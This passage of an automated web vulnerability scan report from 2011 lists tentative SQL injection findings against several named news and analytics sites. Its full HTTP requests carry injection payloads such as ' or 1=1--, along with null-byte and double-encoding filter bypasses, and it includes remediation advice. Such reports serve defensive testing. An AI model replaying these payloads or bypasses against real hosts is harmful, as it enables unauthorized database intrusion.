Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:42 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/hcfellegirlprod/1 was not found on this server.
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/hcfellegirlprod/1%00''/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:42 GMT
Server: Omniture DC/2.0.0
xserver: www409
Content-Length: 0
Content-Type: text/html


1.18. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s92442379223648 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.seattlepi.com
Path:   /b/ss/hearstseattlepi/1/H.21/s92442379223648

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/hearstseattlepi/1/H.21/s92442379223648?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A24%206%20300&ce=UTF-8&ns=hearst&g=http%3A//www.seattlepi.com/flashtalking/ftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A//mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26&r=http%3A//www.seattlepi.com/&cc=USD&pageType=errorPage&events=event16&c12=New&v12=New&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=300&bh=250&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295384437-New%7C1318887384437%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:02:42 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/hearstseattlepi/1/H.21/s92442379223648?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A24%206%20300&ce=UTF-8&ns=hearst&g=http%3A//www.seattlepi.com/flashtalking/ftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A//mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26&r=http%3A//www.seattlepi.com/&cc=USD&pageType=errorPage&events=event16&c12=New&v12=New&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=300&bh=250&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295384437-New%7C1318887384437%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:02:42 GMT
Server: Omniture DC/2.0.0
xserver: www600
Content-Length: 0
Content-Type: text/html


1.19. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s94189070519059 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.seattlepi.com
Path:   /b/ss/hearstseattlepi/1/H.21/s94189070519059

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/hearstseattlepi/1/H.21/s94189070519059?AQB=1&ndh=1&t=17/8/2011%2016%3A42%3A7%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; __qca=P0-1682088852-1316295406495; s_pers=%20s_nr%3D1316295727539-New%7C1318887727539%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:26:41 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/hearstseattlepi/1/H.21/s94189070519059 was n
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/hearstseattlepi/1/H.21/s94189070519059?AQB=1&ndh=1&t=17/8/2011%2016%3A42%3A7%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; __qca=P0-1682088852-1316295406495; s_pers=%20s_nr%3D1316295727539-New%7C1318887727539%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:26:40 GMT
Server: Omniture DC/2.0.0
xserver: www617
Content-Length: 0
Content-Type: text/html


1.20. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s98951816044282 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.seattlepi.com
Path:   /b/ss/hearstseattlepi/1/H.21/s98951816044282

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/hearstseattlepi%00'/1/H.21/s98951816044282?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A10%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.2.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295370718-New%7C1318887370718%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:06:31 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/hearstseattlepi was not found on this server.</
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/hearstseattlepi%00''/1/H.21/s98951816044282?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A10%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.2.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295370718-New%7C1318887370718%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:06:31 GMT
Server: Omniture DC/2.0.0
xserver: www596
Content-Length: 0
Content-Type: text/html


1.21. http://syn.verticalacuity.com/varw/getPromo [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://syn.verticalacuity.com
Path:   /varw/getPromo

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10313007'%20or%201%3d1--%20 and 10313007'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /varw/getPromo?conId=5dfcbd14-8acb-492e-ab5d-382bd54ff582&cId=3yvaza&fp=true&holdout=false&pUrl=http%3A%2F%2Fwww.ugo.com%2F&cb=1316294751737&tOff=-5&seq=1 HTTP/1.1
Host: syn.verticalacuity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=10313007'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 17 Sep 2011 16:32:03 GMT
Server: nginx
Content-Length: 1392
Connection: keep-alive

(function() {
   var BASE_URL = 'http://syn.verticalacuity.com/varw/';
   var dataVar = 'recData' || 'data';    
   var data = {"baseUrl":"http://syn.verticalacuity.com/varw/","dataVarName":"recData","d":[],"scripts":[],"styles":[],"siteEnabled":false};
   
   if(!window.VAData){window.VAData={}}window.VAData.dataVar=dataVar;window.VAData[dataVar]=data;(function(){var e=data.baseUrl;var i=document;var h="head";var b="?cb="+Math.round(new Date().getTime()/3600000);var d=function(j){try{for(var m=0;m<j.length;m++){var n=e+j[m];if(j[m].indexOf("http://")===0||j[m].indexOf("https://")===0){n=j[m]}var k=i.createElement("script");k.type="text/javascript";k.src=n+b;k.defer=true;((i.getElementsByTagName(h))[0]).appendChild(k)}}catch(l){}};var c=function(n){try{for(var l=0;l<n.length;l++){var j=e+n[l];if(n[l].indexOf("http://")===0||n[l].indexOf("https://")===0){j=n[l]}var m=i.createElement("link");m.rel="stylesheet";m.type="text/css";m.media="all";m.href=j+b;((i.getElementsByTagName(h))[0]).appendChild(m)}}catch(k){}};var f=function(){var n=document.domain.split("."),j=n.length,k=n;if(j>=2){var l=n[j-2]+"."+n[j-1];if(n[j-2]=="co"){l=n[j-3]+"."+l}k=l}var m="_vaNP=siteEnabled=false; path=/";m+=k!==null?"; domain="+k:"";i.cookie=m};try{if(data){if(data.siteEnabled==true){c(data.styles);d(data.scripts)}else{f()}}}catch(g){try{log("error","Failure in VAPromo: "+g.message)}catch(a){}}})();
})();

Request 2

GET /varw/getPromo?conId=5dfcbd14-8acb-492e-ab5d-382bd54ff582&cId=3yvaza&fp=true&holdout=false&pUrl=http%3A%2F%2Fwww.ugo.com%2F&cb=1316294751737&tOff=-5&seq=1 HTTP/1.1
Host: syn.verticalacuity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=10313007'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 17 Sep 2011 16:32:04 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Server: nginx
Set-Cookie: JSESSIONID=wz5uxs7ukadb1jau0zxh73neo;Path=/varw
Content-Length: 1392
Connection: keep-alive

(function() {
   var BASE_URL = 'http://syn.verticalacuity.com/varw/';
   var dataVar = 'recData' || 'data';    
   var data = {"baseUrl":"http://syn.verticalacuity.com/varw/","dataVarName":"recData","d":[],"scripts":[],"styles":[],"siteEnabled":false};
   
   if(!window.VAData){window.VAData={}}window.VAData.dataVar=dataVar;window.VAData[dataVar]=data;(function(){var e=data.baseUrl;var i=document;var h="head";var b="?cb="+Math.round(new Date().getTime()/3600000);var d=function(j){try{for(var m=0;m<j.length;m++){var n=e+j[m];if(j[m].indexOf("http://")===0||j[m].indexOf("https://")===0){n=j[m]}var k=i.createElement("script");k.type="text/javascript";k.src=n+b;k.defer=true;((i.getElementsByTagName(h))[0]).appendChild(k)}}catch(l){}};var c=function(n){try{for(var l=0;l<n.length;l++){var j=e+n[l];if(n[l].indexOf("http://")===0||n[l].indexOf("https://")===0){j=n[l]}var m=i.createElement("link");m.rel="stylesheet";m.type="text/css";m.media="all";m.href=j+b;((i.getElementsByTagName(h))[0]).appendChild(m)}}catch(k){}};var f=function(){var n=document.domain.split("."),j=n.length,k=n;if(j>=2){var l=n[j-2]+"."+n[j-1];if(n[j-2]=="co"){l=n[j-3]+"."+l}k=l}var m="_vaNP=siteEnabled=false; path=/";m+=k!==null?"; domain="+k:"";i.cookie=m};try{if(data){if(data.siteEnabled==true){c(data.styles);d(data.scripts)}else{f()}}}catch(g){try{log("error","Failure in VAPromo: "+g.message)}catch(a){}}})();
})();

1.22. http://www.answerology.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:27 GMT
Content-Length: 58819
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Relationship Advice - Get Answers to Relationship Questions</title>
<meta name="
